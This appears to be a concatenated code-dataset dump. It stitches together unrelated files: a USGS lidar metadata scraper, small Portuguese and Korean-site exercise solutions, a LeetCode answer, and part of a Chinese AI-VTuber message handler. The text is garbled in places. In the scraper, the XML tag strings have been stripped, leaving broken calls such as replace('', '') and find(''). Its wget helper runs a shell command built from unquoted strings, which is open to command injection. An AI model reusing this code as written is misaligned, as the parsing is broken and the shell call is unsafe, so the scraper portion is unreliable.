dates.append(line.replace('', '').replace('', '').strip())\n\n if date_seen and len(dates) == 2:\n date_extracted = True\n\n\n if (not bounds_seen and not bounds_extracted) or line.find('') >= 0:\n bounds_seen = True\n\n if not bounds_extracted and line.find('') >=0:\n bounds['w'] = float(line.replace('', '').replace('', '').strip())\n if not bounds_extracted and line.find('') >=0:\n bounds['e'] = float(line.replace('', '').replace('', '').strip())\n if not bounds_extracted and line.find('') >=0:\n bounds['n'] = float(line.replace('', '').replace('', '').strip())\n if not bounds_extracted and line.find('') >=0:\n bounds['s'] = float(line.replace('', '').replace('', '').strip())\n\n if bounds_seen and len(bounds.keys()) == 4:\n bounds_extracted = True\n\n if line.find('') >= 0:\n projection = line.replace('', '').replace('', '').strip()\n\n projection_cleanup_regex = re.compile('\\s*/.+$', re.IGNORECASE)\n if projection != '':\n projection = projection_cleanup_regex.sub('', projection)\n projection = projection.strip()\n\n\n if len(bounds.keys()) < 4:\n errors['bounds'] = 'less than 4 vorteces of bbox'\n bounds_polygon_coordinates = None\n else:\n bounds_polygon_coordinates = [\n [bounds['w'], bounds['n']],\n [bounds['e'], bounds['n']],\n [bounds['e'], bounds['s']],\n [bounds['w'], bounds['s']]]\n\n return (bounds_polygon_coordinates, dates, projection, errors)\n\n\ndef polygon_multipolygon_overlap_check(lidar_polygon, city_multi_polygon):\n p1 = Polygon(lidar_polygon)\n is_intersects = False\n for polygon_i in city_multi_polygon:\n p2 = Polygon(polygon_i[0]) # take the first \"shell\" polygon (and not the subsequent \"holes\")\n is_intersects = is_intersects or p1.intersects(p2)\n\n return is_intersects\n\n\ndef city_polygon_get(city_id):\n file_obj = open('../cities/%s.json' % city_id)\n bounds = json.loads(file_obj.read())\n multipolygon = bounds.get('geometries')[0].get('coordinates')\n return multipolygon\n\ndef find_overlapping_lidar_scans(project_id, subproject_id, city_id):\n city_multi_polygon = city_polygon_get(city_id)\n\n dir_path = downloads_dir_get(project_id)\n file_list = os.listdir(dir_path)\n\n file_bounds_and_date = {}\n for f in file_list:\n if f.find('.xml') < 0:\n continue\n bounds_and_date = metadata_extract_data(project_id, subproject_id, f)\n if bounds_and_date != None:\n if polygon_multipolygon_overlap_check(bounds_and_date[0], city_multi_polygon):\n file_bounds_and_date[f] = bounds_and_date\n\n return file_bounds_and_date\n\ndef download_meta_shape_files_from_zip(index_filename, project_id, subproject_id, limit=4):\n # download ZIP\n # extract ZIP\n # extract geo info from SHP file => geojson ?!\n # USE geopandas to read SHP file (as long as all other files are in same dir)\n return None\n\nprojections_aliases = {\n 'NAD83(CSRS98)' : 'EPSG:4140',\n 'NAD83(HARN)' : 'EPSG:4152',\n 'WGS 84' : 'EPSG:4326',\n 'NAD83(CSRS)' : 'EPSG:4617',\n 'NAVD88 height' : 'EPSG:5703',\n 'NAD83(2011)' : 'EPSG:6318',\n 'NAD83(CSRS)v2' : 'EPSG:8237',\n 'NAD83(CSRS)v3' : 'EPSG:8240',\n 'NAD83(CSRS)v4' : 'EPSG:8246',\n 'NAD83(CSRS)v6' : 'EPSG:8252',\n 'NAD83(CSRS)v7' : 'EPSG:8255'\n}\n\ndef projection_convert(coordinates, projection, geometry_type):\n import geopandas\n\n # CAlifornia projection 6420 (ID is the SW corner of the tile \"w123123n123123\")\n # \"EPSG:6420\"\n # [[6051000,2130000], [6051000,2133000], [6054000,2133000], [6054000,2130000]]\n # https://epsg.io/transform#s_srs=6420&t_srs=4326&x=0.0000000&y=0.0000000\n # x (w->e) 6054000 ---decreases---> 6051000 = 3000 (feet wide)\n # y (n->s) 2133000 ---decreases---> 2130000 = 3000 (feet tall)\n\n # data for GeoDataFrame with local-projection coordinates\n if geometry_type == 'polygon':\n geometry = Polygon(coordinates)\n elif geometry_type == 'point':\n geometry = Point(coordinates)\n\n data = {'col1': ['p1'], 'geometry': geometry}\n\n # convert alias/alternate projection ID to standard EPSG ID\n projection_EPSG = projection\n if projection in projections_aliases:\n projection_EPSG = projections_aliases[projection]\n\n print (projection_EPSG)\n # specify projection of coordinates\n geo_data_frame = geopandas.GeoDataFrame(data, crs=projection_EPSG)\n # convert to standard lng/lat\n geo_data_frame_EPSG4326 = geo_data_frame.to_crs(4326)\n\n # returns a Shapely Polygon/Point object\n return geo_data_frame_EPSG4326.geometry[0]\n\n\ndef laz_file_fetch(project_id, subproject_id, filename):\n status = 'in progress'\n dir_path = downloads_dir_get(project_id)\n url = '%s/%s/%s/LAZ/%s' % (url_base, project_id, subproject_id, filename)\n download_filepath = '%s/%s' % (dir_path, filename)\n\n wget_status = wget_fetch(url, download_filepath, 9)\n return 'success' if wget_status == True else wget_status\n\ndef laz_extract_data(project_id, subproject_id, filename, point_limit=0):\n # Buffered read to extract all dates of individual points\n # (buffered so that we do not need HUGE RAM and costly VMs)\n import numpy as np\n import laspy\n\n dir_path = downloads_dir_get(project_id)\n file = '%s/%s' % (dir_path, filename)\n\n data = {'bbox': [], 'bbox_polygon': [], 'date_range': [None, None]}\n with laspy.open(file) as f:\n\n # fetch bounding box from header (if meta data did not provide any info on bounding box)\n data['bbox'].append([f.header.min[0], f.header.max[0]]) # x0, y0 = lng0, lat0\n data['bbox'].append([f.header.min[1], f.header.max[1]]) # x1, y1 = lng1, lat1\n data['bbox_polygon'].append([f.header.min[0], f.header.max[1]]) # x0, y1 = lng0, lat1\n data['bbox_polygon'].append([f.header.min[0], f.header.min[1]])\n data['bbox_polygon'].append([f.header.max[0], f.header.min[1]])\n data['bbox_polygon'].append([f.header.max[0], f.header.max[1]])\n # f.header.min[2] # z0 (elevation0)\n # f.header.max[2] # z1 (elevation1)\n\n\n i = point_limit\n for point in f.chunk_iterator(100):\n gps_times = list(point.point_format.dimension_names)\n gps_times_index = gps_times.index('gps_time')\n #gps_time is often used in the laz 1.4 standard. However, the lidar operator may do something weird here so be careful!\n #actually it is always a bit weird: The gps_time is seconds since January 6th 1980 minus 1 billion. So to get a unix timestamp we do the following:\n unix_time = point.gps_time[0]+1000000000+315964782\n\n if data['date_range'][0] == None:\n data['date_range'][0] = unix_time\n if data['date_range'][1] == None:\n data['date_range'][1] = unix_time\n\n data['date_range'][0] = min(data['date_range'][0], unix_time)\n data['date_range'][1] = max(data['date_range'][1], unix_time)\n\n i = i - 1\n if point_limit > 0 and i <= 0:\n break\n\n #now turn the unix timstamp to a local timestamp:\n data['date_range_local'] = [datetime.fromtimestamp(data['date_range'][0]), datetime.fromtimestamp(data['date_range'][1])]\n\n return data\n\ndef laz_meta_extract_data(project_id, subproject_id, filename):\n meta_filename = filename.replace('.laz', '.xml')\n laz_filename = filename.replace('.xml', '.laz')\n laz_data = laz_extract_data(project_id, subproject_id, laz_filename)\n meta_data = metadata_extract_data(project_id, subproject_id, meta_filename)\n\n converted = projection_convert(laz_data['bbox'][0], meta_data[2], 'point')\n print (laz_data)\n print(laz_data['bbox'][0], meta_data[2], converted)\n\ndef test_fetch(url, download_filepath):\n return wget_fetch(url, download_filepath, 2)\n\ndef wget_fetch(url, download_filepath, retries=9):\n i = retries\n wget_process_out = None\n while i > 0:\n cmd = \"wget -S --quiet -t 1 -O %s %s \" % (download_filepath, url)\n wget_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n wget_process_out = str(wget_process.communicate()[0], 'utf-8')\n\n if wget_process_out != None and wget_process_out != '':\n break\n i = i - 1\n\n return check_wget_response_and_download(wget_process_out, download_filepath)\n\ndef check_wget_response_and_download(response, download_filepath):\n if response == None or response == '':\n return 'no response'\n\n if not os.path.isfile(download_filepath):\n return ''\n\n file = open(download_filepath, 'r')\n file_contents = file.read()\n if len(file_contents) == 0:\n os.remove(download_filepath)\n return 'not downloaded'\n\n response_lines = response.split(\"\\n\")\n if not ' 200 ' in response_lines[0]:\n os.remove(download_filepath)\n return response_lines[0]\n\n return True\n\ndef cleanup_download(filepath):\n if os.path.isfile(filepath):\n os.remove(filepath)\n\n# check if there is META Data\n# if META DATA is a list of XML files, download them, find bouning box\n# if META DATA is a ZIP file of SHP fileset, try to download and convert with geopandas to a bounding box\n# if META DATA ZIP is corrupted or missing, use the wXXXX nYYYY local projection in filename and convert to a bounding box if we can figure out the projection\n# if no metadata possible, count the number of LAZ files and if NOT too big, download them all and grab date/bounding box from there\n# if DATA is older than 2014, mark it as old, check FILE NAME of project name/dataset for year\n\n\n# RESULT\n# TODO: an easy to way to monitor a scraping process (simple webpage that polls the scraped files/data)\n# - a list of USGS projects/datasets to scrape (with status next to each)\n# - button to kick off a scrape or re-scrape\n# - checks/status on\n# - scrape process is running normally, scrape process did not exist abnormally\n# - meta index was fetch (or failed to fetch): 2053 meta files total\n# - 2040 meta files fetched, 13 failed to fetch\n# - 2020 meta files contain proper bounding box/dates, 20 contain invalid bounding box/dates (manually investigate)\n# - 1240 meta files intersect with RICHMOND, CA,\n# - 1233 LAZ files fetch, 7 failed to fetch\n# - 1233 LAZ files dates parsed\n# - date ranges from LAZ: 1/2/2020-1/19/2020\n# - date ranges from Meta: 1/1/2020-1/20/2020\n\n# TODO: tie to the satellite imagery\n\n# TODO: compare the rngdates from XML meta file to point reading from LAZ file in first 2-3 sets to establish if meta data is enough\n# city polygon\n# array of lidar scan polygons with dates attached to each: rows of the format: ,,,\n# a global date range for entire city lidar points\n# ==> ideally we can put this on a Mapbox UI\n\ndef run(cmd, args):\n out = '''select a Command:\n projects_get\n downloads_dir_get\n downloads_dir_list\n project_get\n metadata_files_fetch\n metadata_file_fetch\n metadata_extract_data\n city_polygon_get\n polygon_multipolygon_overlap_check\n find_overlapping_lidar_scans\n laz_file_fetch\n laz_extract_data\n laz_and_meta_extract_data\n --- test: ----\n test_fetch\n '''\n if cmd == 'downloads_dir_get':\n out = downloads_dir_get(args.project_id)\n elif cmd == 'project_get':\n out = project_get(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), args.options=='json_only')\n elif cmd == 'project_scrape':\n out = project_scrape(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), args.options=='json_only')\n elif cmd == 'metadata_files_fetch':\n out = metadata_files_fetch(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), -1)\n elif cmd == 'project_metadata_count':\n out = project_metadata_count(args.project_id+('/'+args.subproject_id if args.subproject_id else ''))\n elif cmd == 'metadata_file_fetch':\n out = metadata_file_fetch(args.project_id, args.subproject_id, args.file)\n elif cmd == 'downloads_dir_list':\n out = os.listdir(downloads_dir_get(args.project_id))\n elif cmd == 'metadata_extract_data':\n out = metadata_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'city_polygon_get':\n out = city_polygon_get(args.city_id)\n elif cmd == 'polygon_multipolygon_overlap_check':\n out = polygon_multipolygon_overlap_check(\n metadata_extract_data(args.project_id, args.subproject_id, args.file)[0],\n city_polygon_get(args.city_id))\n elif cmd == 'find_overlapping_lidar_scans':\n out = find_overlapping_lidar_scans(\n args.project_id, args.subproject_id, args.city_id)\n elif cmd == 'laz_file_fetch':\n out = laz_file_fetch(args.project_id, args.subproject_id, args.file)\n elif cmd == 'laz_extract_data':\n out = laz_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'laz_and_meta_extract_data':\n out = laz_meta_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'projects_get':\n out = projects_get(args.options == 'json_only')\n elif cmd == 'projects_scrape':\n out = projects_scrape(args.options == 'json_only')\n elif cmd == 'test_fetch':\n out = test_fetch(args.test_url, args.test_download_file)\n\n print(out)\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--cmd', dest='cmd', type=str, help='Specify command')\nparser.add_argument('--project_id', dest='project_id', type=str, help='Specify project ID')\nparser.add_argument('--subproject_id', dest='subproject_id', type=str, help='Specify sub-project ID')\nparser.add_argument('--file', dest='file', type=str, help='Specify file')\nparser.add_argument('--options', dest='options', type=str, help='Specify options')\nparser.add_argument('--test-url', dest='test_url', type=str, help='Specify TEST URL')\nparser.add_argument('--test-download-file', dest='test_download_file', type=str, help='Specify TEST download file')\nargs = parser.parse_args()\n\nsample_project_id = 'CA_NoCAL_3DEP_Supp_Funding_2018_D18'\nsample_subproject_id = 'CA_NoCAL_Wildfires_B5b_2018'\nsample_meta_index = 'meta_index_23_03_01_12_29_46__6407.html'\nsample_meta = 'USGS_LPC_CA_NoCAL_3DEP_Supp_Funding_2018_D18_w2215n1973.xml'\nsample_laz = 'USGS_LPC_CA_NoCAL_3DEP_Supp_Funding_2018_D18_w2215n1973.laz'\nsample_city_id = 'richmond-ca'\nsample_lidar_polygon = [\n (-122.3583707, 37.9432179),\n (-122.3583707, 37.9422179),\n (-122.3573707, 37.9422179),\n (-122.3573707, 37.9432179)]\n\nif (__name__ == '__main__'):\n run(args.cmd, args)","repo_name":"hyphae-lab/lai-algorithm-training-scraper","sub_path":"usgs-scraper/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":31110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6020748397","text":"print('\\033[1;34m=-=-=-=- GERADOR DE PA -=-=-=-=\\033[m')\nnum = int(input('Qual PRIMEIRO TERMO?'))\nrazao = int(input('Qual a razão?'))\ntermo = num\ncont = 1\na = 10\nwhile cont <=10:\n print('\\033[1;32m {} \\033[m'.format(termo),end='')\n print('>>' if cont < 10 else 'PAUSA',end='')\n termo += razao\n cont +=1\n # DAQUI PRA BAIXO 62!\n if cont == 11:\n d = int(input('\\n Quantos termos mais quer mostrar?'))\n cont -= d\n a += d\n if d == 0:\n print('\\033[1;34mProgressão finalizada com\\033[m \\033[1;31m{} \\033[1;34mtermos!\\033[m'.format(a))","repo_name":"19AllefKeynner/exercicios-python","sub_path":"ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35117561183","text":"memo = {0: 0, 1: 1}\n\n\ndef fibonacci(n):\n global cnt_0, cnt_1\n if n == 0:\n cnt_0 += 1\n return 0\n elif n == 1:\n cnt_1 += 1\n return 1\n elif n in memo:\n return memo[n]\n else:\n memo[n] = fibonacci(n - 1) + fibonacci(n - 2)\n return memo[n]\n\n\nT = int(input())\nfor t in range(T):\n cnt_0 = 0\n cnt_1 = 0\n N = int(input())\n fibonacci(N)\n print(cnt_0, cnt_1)\n # fibonacci(40)\n # if N == 0:\n # print(\"1 0\")\n # elif N == 1:\n # print(\"0 1\")\n # elif N == 2:\n # print(\"1 1\")\n # else:\n # print(memo[N - 1], memo[N])\n\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/1003_피보나치 함수/B_1003.py","file_name":"B_1003.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2616279017","text":"class Solution:\n def nearestValidPoint(self, x: int, y: int, points: list[list[int]]) -> int:\n\n bestIndex = -1\n shortest_distance = 0\n\n for index in range(len(points)):\n point = points[index]\n if (x == point[0] or y == point[1]):\n man_distance = abs(x-point[0]) + abs(y-point[1])\n if (man_distance < shortest_distance or bestIndex == -1):\n bestIndex = index\n shortest_distance = man_distance\n\n return bestIndex\n","repo_name":"semere01/Comptetitive-Programming","sub_path":"a2sv-group-43/python-sheet/find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23711616785","text":"import os, threading, json, random\nimport difflib\nimport logging\nfrom datetime import datetime\nimport traceback\nimport importlib\nimport pyautogui\n\nfrom .config import Config\nfrom .common import Common\nfrom .audio import Audio\nfrom .gpt_model.gpt import GPT_MODEL\nfrom .logger import Configure_logger\nfrom .db import SQLiteDB\n\n\n\"\"\"\n\t___ _ \n\t|_ _| | ____ _ _ __ ___ ___ \n\t | || |/ / _` | '__/ _ \\/ __|\n\t | || < (_| | | | (_) \\__ \\\n\t|___|_|\\_\\__,_|_| \\___/|___/\n\n\"\"\"\n\n\nclass My_handle():\n common = None\n config = None\n audio = None\n\n def __init__(self, config_path):\n logging.info(\"初始化My_handle...\")\n\n if My_handle.common is None:\n My_handle.common = Common()\n if My_handle.config is None:\n My_handle.config = Config(config_path)\n if My_handle.audio is None:\n My_handle.audio = Audio(config_path)\n\n # 日志文件路径\n file_path = \"./Log/Log-\" + My_handle.common.get_bj_time(1) + \".txt\"\n Configure_logger(file_path)\n\n self.proxy = None\n # self.proxy = {\n # \"http\": \"http://127.0.0.1:10809\",\n # \"https\": \"http://127.0.0.1:10809\"\n # }\n\n try:\n # 数据丢弃部分相关的实现\n self.data_lock = threading.Lock()\n self.timers = {}\n\n # 设置会话初始值\n self.session_config = {'msg': [{\"role\": \"system\", \"content\": My_handle.config.get('chatgpt', 'preset')}]}\n self.sessions = {}\n self.current_key_index = 0\n\n # 直播间号\n self.room_id = My_handle.config.get(\"room_display_id\")\n\n self.before_prompt = My_handle.config.get(\"before_prompt\")\n self.after_prompt = My_handle.config.get(\"after_prompt\")\n\n # 过滤配置\n self.filter_config = My_handle.config.get(\"filter\")\n # 答谢\n self.thanks_config = My_handle.config.get(\"thanks\")\n\n self.chat_type = My_handle.config.get(\"chat_type\")\n\n self.need_lang = My_handle.config.get(\"need_lang\")\n\n # 优先本地问答\n self.local_qa = My_handle.config.get(\"local_qa\")\n self.local_qa_audio_list = None\n \n # 音频合成使用技术\n My_handle.audio_synthesis_type = My_handle.config.get(\"audio_synthesis_type\")\n\n # Stable Diffusion\n self.sd_config = My_handle.config.get(\"sd\")\n\n # 点歌模块\n self.choose_song_config = My_handle.config.get(\"choose_song\")\n self.choose_song_song_lists = None\n\n logging.info(f\"配置数据加载成功。\")\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 设置GPT_Model全局模型列表\n GPT_MODEL.set_model_config(\"openai\", My_handle.config.get(\"openai\"))\n GPT_MODEL.set_model_config(\"chatgpt\", My_handle.config.get(\"chatgpt\"))\n GPT_MODEL.set_model_config(\"claude\", My_handle.config.get(\"claude\")) \n\n \"\"\"\n 新增LLM后,这边先定义下各个变量,下面会用到\n \"\"\"\n self.chatgpt = None\n self.claude = None\n self.claude2 = None\n self.chatglm = None\n self.chat_with_file = None\n self.text_generation_webui = None\n self.sparkdesk = None\n self.langchain_chatglm = None\n self.zhipu = None\n self.bard_api = None\n self.yiyan = None\n self.tongyi = None\n\n\n # 聊天相关类实例化\n if self.chat_type == \"chatgpt\":\n self.chatgpt = GPT_MODEL.get(\"chatgpt\")\n\n elif self.chat_type == \"claude\":\n self.claude = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if not self.claude.reset_claude():\n logging.error(\"重置Claude会话失败喵~\")\n elif self.chat_type == \"claude2\":\n GPT_MODEL.set_model_config(\"claude2\", My_handle.config.get(\"claude2\"))\n\n self.claude2 = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if self.claude2.get_organization_id() is None:\n logging.error(\"重置Claude2会话失败喵~\")\n elif self.chat_type == \"chatterbot\":\n from chatterbot import ChatBot # 导入聊天机器人库\n\n self.chatterbot_config = My_handle.config.get(\"chatterbot\")\n\n try:\n self.bot = ChatBot(\n self.chatterbot_config[\"name\"], # 聊天机器人名字\n database_uri='sqlite:///' + self.chatterbot_config[\"db_path\"] # 数据库URI,数据库用于存储对话历史\n )\n except Exception as e:\n logging.info(e)\n exit(0)\n elif self.chat_type == \"chatglm\":\n GPT_MODEL.set_model_config(\"chatglm\", My_handle.config.get(\"chatglm\"))\n\n self.chatglm = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"chat_with_file\":\n from Tools.chat_with_file.chat_with_file import Chat_with_file\n self.chat_with_file = Chat_with_file(My_handle.config.get(\"chat_with_file\"))\n elif self.chat_type == \"text_generation_webui\":\n GPT_MODEL.set_model_config(\"text_generation_webui\", My_handle.config.get(\"text_generation_webui\"))\n\n self.text_generation_webui = GPT_MODEL.get(self.chat_type) \n elif self.chat_type == \"sparkdesk\":\n GPT_MODEL.set_model_config(\"sparkdesk\", My_handle.config.get(\"sparkdesk\"))\n\n self.sparkdesk = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"langchain_chatglm\":\n GPT_MODEL.set_model_config(\"langchain_chatglm\", My_handle.config.get(\"langchain_chatglm\"))\n\n self.langchain_chatglm = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"zhipu\":\n GPT_MODEL.set_model_config(\"zhipu\", My_handle.config.get(\"zhipu\"))\n\n self.zhipu = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"bard\":\n GPT_MODEL.set_model_config(\"bard\", My_handle.config.get(\"bard\"))\n\n self.bard_api = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"yiyan\":\n GPT_MODEL.set_model_config(\"yiyan\", My_handle.config.get(\"yiyan\"))\n\n self.yiyan = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"tongyi\":\n GPT_MODEL.set_model_config(\"tongyi\", My_handle.config.get(\"tongyi\"))\n\n self.tongyi = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"game\":\n self.game = importlib.import_module(\"game.\" + My_handle.config.get(\"game\", \"module_name\"))\n\n # exit(0)\n\n # 判断是否使能了SD\n if self.sd_config[\"enable\"]:\n from Tools.sd import SD\n\n self.sd = SD(self.sd_config)\n\n # 判断是否使能了点歌模式\n if self.choose_song_config[\"enable\"]:\n # 获取本地音频文件夹内所有的音频文件名\n self.choose_song_song_lists = My_handle.audio.get_dir_audios_filename(self.choose_song_config[\"song_path\"])\n\n # 日志文件路径\n self.log_file_path = \"./Log/Log-\" + My_handle.common.get_bj_time(1) + \".txt\"\n if os.path.isfile(self.log_file_path):\n logging.info(f'{self.log_file_path} 日志文件已存在,跳过')\n else:\n with open(self.log_file_path, 'w') as f:\n f.write('')\n logging.info(f'{self.log_file_path} 日志文件已创建')\n\n self.comment_file_path = \"./Log/comment-\" + My_handle.common.get_bj_time(1) + \".txt\"\n if os.path.isfile(self.comment_file_path):\n logging.info(f'{self.comment_file_path} 弹幕文件已存在,跳过')\n else:\n with open(self.comment_file_path, 'w') as f:\n f.write('')\n logging.info(f'{self.comment_file_path} 弹幕文件已创建')\n\n \"\"\" \n \n ............. '>)xcn)I \n }}}}}}}}}}}}](v0kaaakad\\.. \n ++++++~~++<_xpahhhZ0phah> \n _________+(OhhkamuCbkkkh+ \n ?????????nbhkhkn|makkkhQ^ \n [[[[[[[}UhkbhZ]fbhkkkhb< \n 1{1{1{1ChkkaXicohkkkhk] \n ))))))JhkkhrICakkkkap- \n \\\\\\\\|ckkkat;0akkkka0> \n ttt/fpkka/;Oakhhaku\" \n jjjjUmkau^QabwQX\\< '!<++~>iI .;>++++<>I' :+}}{?; \n xxxcpdkO\"capmmZ/^ +Y-;,,;-Lf ItX/+l:\",;>1cx> .`\"x#d>` .`. \n uuvqwkh+1ahaaL_ 'Zq; ;~ '/bQ! \"uhc: . 1oZ' \"vj. ^' \n ccc0kaz!kawX}' .\\hbv?: .jop; .C*L^ )oO` .':I^. .\"_L!^^. ':;,' \n XXXXph_cU_\" >rZhbC\\! \"qaC... faa~ )oO` ;-jqj .l[mb1]_' ^(|}\\Ow{ \n XXXz00i+ '!1Ukkc, 'JoZ` . uop; )oO' >ou .Lp\" . ,0j^^>Yvi \n XXXzLn. . ^> lC#( lLot. _kq- . 1o0' >on .Qp, }*|>}}}/rrx1]~^ ^?jvv/]--]{r) .i{x/+; ]Xr1_;. :(vnrj\\i. \n '1.. .''. . .Itq*Z}` .. \n +; . \"}XmQf-i!;. \n . ';>= min_similarity]\n \n # 如果没有符合条件的回答,返回None\n if not similarity_responses:\n return None\n \n # 按相似度降序排序\n similarity_responses.sort(reverse=True, key=lambda x: x[0])\n \n # 获取相似度最高的回答列表\n top_response = similarity_responses[0][1]\n \n # 随机选择一个回答\n response = random.choice(top_response)\n \n return response\n\n\n # 本地问答库 处理\n def local_qa_handle(self, data):\n \"\"\"本地问答库 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n # 1、匹配本地问答库 触发后不执行后面的其他功能\n if self.local_qa[\"text\"][\"enable\"] == True:\n # 根据类型,执行不同的问答匹配算法\n if self.local_qa[\"text\"][\"type\"] == \"text\":\n tmp = self.find_answer(content, self.local_qa[\"text\"][\"file_path\"], self.local_qa[\"text\"][\"similarity\"])\n else:\n tmp = self.find_similar_answer(content, self.local_qa[\"text\"][\"file_path\"], self.local_qa[\"text\"][\"similarity\"])\n\n if tmp != None:\n logging.info(f\"触发本地问答库-文本 [{user_name}]: {content}\")\n # 将问答库中设定的参数替换为指定内容,开发者可以自定义替换内容\n if \"{cur_time}\" in tmp:\n tmp = tmp.format(cur_time=My_handle.common.get_bj_time(5))\n if \"{username}\" in tmp:\n tmp = tmp.format(username=user_name)\n else:\n tmp = tmp\n \n logging.info(f\"本地问答库-文本回答为: {tmp}\")\n\n resp_content = tmp\n # 将 AI 回复记录到日志文件中\n with open(self.comment_file_path, \"r+\", encoding=\"utf-8\") as f:\n tmp_content = f.read()\n # 将指针移到文件头部位置(此目的是为了让直播中读取日志文件时,可以一直让最新内容显示在顶部)\n f.seek(0, 0)\n # 不过这个实现方式,感觉有点低效\n # 设置单行最大字符数,主要目的用于接入直播弹幕显示时,弹幕过长导致的显示溢出问题\n max_length = 20\n resp_content_substrings = [resp_content[i:i + max_length] for i in\n range(0, len(resp_content), max_length)]\n resp_content_joined = '\\n'.join(resp_content_substrings)\n\n # 根据 弹幕日志类型进行各类日志写入\n if My_handle.config.get(\"comment_log_type\") == \"问答\":\n f.write(f\"[{user_name} 提问]:{content}\\n[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"问题\":\n f.write(f\"[{user_name} 提问]:{content}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"回答\":\n f.write(f\"[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n # 2、匹配本地问答音频库 触发后不执行后面的其他功能\n if self.local_qa[\"audio\"][\"enable\"] == True:\n # 输出当前用户发送的弹幕消息\n # logging.info(f\"[{user_name}]: {content}\")\n # 获取本地问答音频库文件夹内所有的音频文件名\n local_qa_audio_filename_list = My_handle.audio.get_dir_audios_filename(self.local_qa[\"audio\"][\"file_path\"], type=1)\n self.local_qa_audio_list = My_handle.audio.get_dir_audios_filename(self.local_qa[\"audio\"][\"file_path\"], type=0)\n\n # 不含拓展名做查找\n local_qv_audio_filename = My_handle.common.find_best_match(content, local_qa_audio_filename_list, self.local_qa[\"audio\"][\"similarity\"])\n \n # print(f\"local_qv_audio_filename={local_qv_audio_filename}\")\n\n # 找到了匹配的结果\n if local_qv_audio_filename is not None:\n logging.info(f\"触发本地问答库-语音 [{user_name}]: {content}\")\n # 把结果从原文件名列表中在查找一遍,补上拓展名\n local_qv_audio_filename = My_handle.common.find_best_match(local_qv_audio_filename, self.local_qa_audio_list, 0)\n\n # 寻找对应的文件\n resp_content = My_handle.audio.search_files(self.local_qa[\"audio\"][\"file_path\"], local_qv_audio_filename)\n if resp_content != []:\n logging.debug(f\"匹配到的音频原相对路径:{resp_content[0]}\")\n\n # 拼接音频文件路径\n resp_content = f'{self.local_qa[\"audio\"][\"file_path\"]}/{resp_content[0]}'\n logging.info(f\"匹配到的音频路径:{resp_content}\")\n message = {\n \"type\": \"local_qa_audio\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n \n return False\n\n\n # 点歌模式 处理\n def choose_song_handle(self, data):\n \"\"\"点歌模式 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n if self.choose_song_config[\"enable\"] == True:\n # 判断点歌命令是否正确\n if content.startswith(self.choose_song_config[\"start_cmd\"]):\n logging.info(f\"[{user_name}]: {content}\")\n\n # 去除命令前缀\n content = content[len(self.choose_song_config[\"start_cmd\"]):]\n # 判断是否有此歌曲\n song_filename = My_handle.common.find_best_match(content, self.choose_song_song_lists)\n if song_filename is None:\n # resp_content = f\"抱歉,我还没学会唱{content}\"\n # 根据配置的 匹配失败回复文案来进行合成\n resp_content = self.choose_song_config[\"match_fail_copy\"].format(content=content)\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n 